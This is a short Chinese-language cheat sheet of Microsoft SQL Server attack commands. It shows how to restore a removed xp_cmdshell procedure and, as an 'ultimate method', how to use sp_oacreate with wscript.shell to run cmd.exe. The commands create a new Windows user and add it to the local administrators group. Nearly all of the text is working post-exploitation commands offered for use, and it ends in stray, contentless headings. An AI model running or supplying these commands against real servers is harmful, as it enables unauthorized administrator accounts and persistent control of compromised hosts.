1 未能找到存儲過程'master..xpcmdshell'. 第一步執(zhí)行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 2 無法裝載 DLL xpsql70.dll 或該DLL所引用的某一 DLL。原因126(找不到指定模塊 第一步執(zhí)行:sp_dropextendedproc "xp_cmdshell" 3 無法在庫 xpweb70.dll 中找到函數(shù) xp_cmdshell。原因: 127(找不到指定的程序。) 第一步執(zhí)行:exec sp_dropextendedproc 'xp_cmdshell'
.終極方法. 2000servser系統(tǒng): declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用戶 /add' xp或2003server系統(tǒng): declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用戶 密碼 /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用戶 /add'
刪除 xp_cmdshell use master
恢復(fù)xp_cmdshlle命令
添加存儲過程
加NT賬號 declare @cmd INT |